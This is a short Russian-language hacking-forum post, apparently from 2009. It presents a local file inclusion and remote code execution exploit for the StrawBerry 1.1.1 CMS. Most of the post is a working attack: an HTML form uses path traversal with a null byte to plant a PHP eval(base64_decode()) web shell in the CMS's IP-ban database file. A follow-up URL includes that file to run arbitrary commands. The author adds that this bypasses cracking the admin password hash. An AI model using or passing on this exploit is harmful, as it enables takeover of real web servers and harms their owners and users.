Показать сообщение отдельно

StrawBerry 1.1.1 LFI / Remote Code Execution Exploit
  #4  
Старый 10.05.2009, 13:09
[AVT]
Новичок
Регистрация: 20.12.2007
Сообщений: 19
С нами: 9680237

Репутация: 52
По умолчанию StrawBerry 1.1.1 LFI / Remote Code Execution Exploit

Развивая тему _http://forum.antichat.ru/showpost.php?p=953944&postcount=71

Выполняем POST-запрос:
Код:
<form method="post" action="http://localhost/strawberry/example/index.php?do=../../../../../inc/mod/ipban.mdu%00">
<input type="text" name="add_ip" value="<h1><?php eval(base64_decode($_GET[cmd]));?></h1>">
<input type="hidden" name="action" value="add">
<input type="hidden" name="mod" value="ipban">
<input type="submit" value="First time">
</form>
Шелл: http://localhost/strawberry/example/index.php?cmd=cGhwaW5mbygpOw==&do=../../../../db/base/ipban.MYD%00

+ Не нужно расшифровывать md5(md5()) хеш админа.

Уточнение: "/example/" - это не пример каталога, а папка в движке StrawBerry.

Последний раз редактировалось [AVT]; 10.05.2009 в 13:44..
 
Ответить с цитированием